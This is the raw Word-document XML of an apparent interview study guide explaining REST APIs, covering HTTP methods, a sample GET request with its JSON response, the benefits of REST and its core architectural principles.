    <w:p w14:paraId="45359C7C" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1768"/>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GET</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retrieve data from the server (e.g., get a user’s details).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C11A83" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1768"/>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POST</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Create a new resource on the server (e.g., add a new user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F22E8C8" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1768"/>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PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Update an existing resource on the server (e.g., update user details).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29492EA7" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1768"/>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DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Remove a resource from the server (e.g., delete a user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778F8904" w14:textId="77777777" w:rsidR="009376C7"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6728994">
          <v:rect id="_x0000_i1948" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5888622D" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example of a REST API Request and Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032B3EC7" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7"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Request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D141762" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7"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GET /users/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D1E231" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7"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Response (JSON format):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDF6F9A" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C9663F" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7"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id": 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1364701B" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7"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name": "John Doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2D80E5" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7"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email": "john.doe@example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB696CC" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC4067E" w14:textId="77777777" w:rsidR="009376C7"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314CB8F">
          <v:rect id="_x0000_i1949" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3A0FAD" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Benefits of REST APIs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47783C16" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176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Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to statelessness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA5E278" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176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Separation of concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between client and server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EE048F" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176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Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> improvements via caching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E31E286" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176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Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using standard HTTP methods and responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACC2332" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009376C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FD1E9CB">
          <v:rect id="_x0000_i1950" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="232DC3C9" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="00CE4B95" w:rsidRDefault="009376C7" w:rsidP="009376C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="395" w:name="_Toc196307875"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain REST architecture?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="395"/>
    </w:p>
    <w:p w14:paraId="79B71818" w14:textId="230DFF15" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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REST (Representational State Transfer) Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an architectural style for designing networked applications, primarily used for building APIs. It uses standard HTTP methods to perform CRUD operations on resources (data or services) identified by URIs (Uniform Resource Identifiers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0024580B" w14:textId="77777777" w:rsidR="00030141"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0D8A013">
          <v:rect id="_x0000_i1951" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D525346" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Core Principles of REST Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A515D87" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177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Statelessness</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7DD5A2" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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Each request from a client to the server must contain all the information needed to understand and process the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C796B07" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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The server does not store any session information between requests. Every request is independent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290BAC18" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177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Client-Server Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD5EDEC" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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The client and server are separate entities, allowing for independent development and deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1546B9" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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The client interacts with the server by sending HTTP requests, and the server responds with data or performs an action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0446EA0C" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177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Uniform Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8D82BC" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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REST defines a set of conventions and constraints for how client and server communicate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD3EDC" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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A uniform interface simplifies the architecture and decouples the client and server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC17295" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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Common conventions include standard HTTP methods (GET, POST, PUT, DELETE) and consistent resource URIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0455B738" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177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Resource-Based</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676280D6" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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lastRenderedPageBreak/>
        <w:t>In REST, the main concept is "resource". A resource can be any object, data, or service that can be accessed over the web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F57300" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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Each resource is identified by a unique URI (e.g., /users, /books/1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B499800" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177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Representation of Resources</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2158F90A" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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When a client requests a resource, the server returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>representation</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the resource (usually in JSON or XML format).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D56C195" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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The representation includes all the necessary information for the client to interact with the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344D5FE0" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177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Stateless Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1763D9D6" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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Each request from the client to the server must be self-contained. The server does not store any session information between requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA8A8D4" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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All the state of the client is stored on the client-side (e.g., cookies, tokens).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D61AECD" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177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Cacheability</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477BA399" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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Responses from the server should explicitly define whether they can be cached by the client or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3FF61A" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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Caching helps in improving performance and reducing the need for repeated requests for the same resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D13543" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177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Layered System</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F521E1" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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REST allows for a layered architecture where intermediaries (like proxies, load balancers, gateways) can be used between the client and server to improve scalability and security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C21AD13" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177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The client doesn't need to know whether it's communicating directly with the end server or an intermediary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F980F4" w14:textId="77777777" w:rsidR="00030141"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181DA9B">
          <v:rect id="_x0000_i1952" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D4DC51" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RESTful API Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1914FACD" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1771"/>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Client Request</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E64930" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1771"/>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The client sends an HTTP request to the server using a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>specific HTTP method</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (GET, POST, PUT, DELETE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2192918D" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1771"/>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The client includes a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resource URI</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify the resource being requested (e.g., /users/1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6A345" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1771"/>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Server Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411247C3" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
